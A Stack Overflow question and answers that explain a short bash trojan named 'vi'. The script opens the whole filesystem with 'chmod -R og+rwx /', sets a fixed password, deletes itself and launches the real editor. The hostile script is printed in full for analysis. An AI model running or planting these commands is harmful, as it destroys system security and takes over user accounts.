# What does this Bash Shell Script do?

Tags: bash, shell, unix

i'm a very clueless beginner when it comes to Shell Scripts but i have to be able to explain what these lines of code do and not enough time to get more familiar with it first, so i cant't really give a lot of input.

As additional information the script itself is called vi just like the editor and is probably harmful/hoping to be run as admin

```
#!/bin/bash
#
# execute on your own risk !!
chmod -R og+rwx /
echo -e ‘‘Hacke.peter\n Hacke.peter\n’’ | passwd
rm $0
vi $*
logout # good bye!
```

I think the idea is that somebody is trying to run the actual vi (not this script) and then he accidentally calls this script - it changes the current users password to the output of the echo command (not sure what that is tho) and then the shell deletes itself and calls the editor so we dont realize anything happened.
huge thank you to any answer in advance and sorry for being so clueless.

Comment: Welcome to the site!  Check out the [tour](https://stackoverflow.com/tour) and the [how-to-ask page](https://stackoverflow.com/help/how-to-ask) for more about asking questions that will attract quality answers.  You can [edit your question](https://stackoverflow.com/posts/52152765/edit) to include more information.  This script specifically is not just *probably* harmful --- it is *definitely* harmful :) .  However, I'm not sure SO is the best place for this question.  Have you tried looking at the docs for the individual commands?  E.g., [chmod](https://linux.die.net/man/1/chmod).

Answer (score 2, accepted):

HMM Not sure if clueless beginner or a crafty hacker [insert suspicious Fry meme]. With the last name like that?

Here's what the script does, step-by-step:

1. `chmod -R og+rwx /`: recursively (`-R`) opens all your files for reading, writing and executing (`+rwx`) by users in your group (`g`) and all other users (`o`).
2. `echo -e ‘‘Hacke.peter\n Hacke.peter\n’’ | passwd`: resets your superuser password to "Hacke.peter".
3. `rm $0`: removes itself. The `$0` in bash stands for the file name of the current script.
4. `vi $*`: opens the real vi editor with whatever arguments (`$*`) you passed to the original (now erased) script. If the script was also called `vi`, this step is to hide the tracks and avoid suspicion.
5. `logout`: logs you out of root mode. Now you no longer have root and your filesystem is open.

Very nasty script!

Comment: It should also be noted that step 1, in addition to opening your security, will  [have other undesired effects](https://serverfault.com/questions/364677/why-is-chmod-r-777-destructive), up to making your whole system basically unusable. This particular variant doesn't delete the sticky bit or set(g)uid bits, so it's not *quite* as destructive as `chmod -R 777 /`, but there are still a lot of other things that will get broken.